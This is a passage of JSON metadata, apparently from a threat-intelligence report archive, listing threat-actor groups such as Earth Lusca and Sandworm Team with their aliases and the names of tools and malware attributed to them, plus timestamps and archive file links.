"WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434248, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/781a1574a9f8bf669ba2f775f05296595e0033a3.pdf", "text": "https://archive.orkl.eu/781a1574a9f8bf669ba2f775f05296595e0033a3.txt", "img": "https://archive.orkl.eu/781a1574a9f8bf669ba2f775f05296595e0033a3.jpg" } }